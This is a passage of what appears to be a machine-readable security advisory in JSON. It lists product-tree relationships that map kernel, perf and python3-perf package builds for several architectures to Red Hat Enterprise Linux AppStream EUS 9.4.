"product_id": "AppStream-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-rt-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-rt-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-core-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-rt-core-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-rt-core-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-rt-debug-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-rt-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-core-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-rt-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-rt-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-kvm-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-rt-debug-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-rt-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-rt-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-rt-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-devel-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-rt-devel-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-rt-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-kvm-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-rt-kvm-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-rt-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-rt-modules-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-rt-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-core-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-rt-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-rt-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-tools-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-tools-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-tools-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-tools-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-tools-libs-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-tools-libs-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-tools-libs-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-zfcpdump-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-zfcpdump-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-core-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-zfcpdump-core-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-zfcpdump-core-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-debuginfo-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-zfcpdump-debuginfo-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-zfcpdump-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-devel-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-zfcpdump-devel-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-zfcpdump-devel-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-devel-matched-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-zfcpdump-devel-matched-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-zfcpdump-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-modules-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-zfcpdump-modules-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-zfcpdump-modules-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-modules-core-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-zfcpdump-modules-core-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-zfcpdump-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-modules-extra-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-zfcpdump-modules-extra-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-zfcpdump-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "libperf-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "libperf-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "libperf-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "libperf-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "libperf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "libperf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "libperf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "libperf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "perf-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "perf-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "perf-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "python3-perf-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "python3-perf-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "python3-perf-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64"
},
